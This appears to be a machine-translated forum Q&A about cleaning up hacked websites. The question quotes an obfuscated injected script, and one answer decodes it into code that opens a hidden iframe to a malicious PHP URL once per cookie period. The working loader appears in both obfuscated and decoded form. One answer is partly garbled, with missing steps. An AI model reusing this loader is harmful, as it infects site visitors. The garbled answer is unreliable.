我管理的许多网站都遭到黑客攻击,并且每个网页都插入了以下javascript代码。我不知道如何解码这个或它甚至做什么,所以我不知道它有多严重。有人可以帮忙吗?
<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>
我假设这些是字符引用,它实际上是指向一个带有某些恶意内容的网站,但我不知道如何解决它。我正在浏览并删除所有这些并更改所有密码以防止进一步的安全问题,但对此的任何建议将不胜感激!
感谢。
答案 0 :(得分:2)
在我的经验,这些类型的攻击发生在共享托管服务器,其中一个自动化的机器人已经或者猜出了密码的账户,或存在账户持有人的桌面上的恶意软件已经捕获的凭证,现在虐待他们。< / p>
你最好的选择?接受肯定会对您的用户产生影响,然后进行尽职调查:
tar -czf website-$(date +%F).tar.gz ~/或您的共享主机备份实用程序。)ps gaux是你的朋友。不要跳过步骤,否则 会再次发生。
答案 1 :(得分:1)
这是注入的。要破译这一点,你的帖子中的javascript做同样的事情。将字符串拆分为逗号上的十六进制字符串,然后将parseInt与base 16拆分,减去22,并查找该char字符的字符。它是如何被恶意使用的,我不确定。有人有什么想法吗?
function v09() {
var static = 'ajax';
var controller = 'index.php';
var v = document.createElement('iframe');
v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';
v.style.position = 'absolute';
v.style.color = '968';
v.style.height = '968px';
v.style.width = '968px';
v.style.left = '1000968';
v.style.top = '1000968';
if (!document.getElementById('v')) {
document.write('<p id=\'v\' class=\'v09\' ></p>');
document.getElementById('v').appendChild(v);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0)
nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1)
return null;
var end = document.cookie.indexOf(";", len);
if (end == -1)
end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {
} else {
SetCookie('visited_uq', '55', '1', '/');
v09();
}
}
答案 2 :(得分:0)
此类事情也发生在我身上,我没有使用共享托管解决方案,我在专用服务器上,没有任何FTP或SSH或SCP活动的证据。
我意识到有人用我的一个表单来代码注入(我的网站是PHP)。这可以通过使用您自己的代码来实现,方法是为文本框或文本字段提供输入,这些输入将由服务器上的某些代码解释。
例如,您可能有一个小表单,允许人们将文件上传到某种目录。有人可以上传一个代码文件然后执行它,这个代码文件可能是用来将javascript代码注入你自己的代码页的罪魁祸首。
使用此实例可以限制允许上载哪些文件类型,将文件放在浏览器无法直接访问的目录中,或者确保文件在上载时没有执行权限。
您还可以确保sanitize inputs,以便任何形式的恶意文本都无效。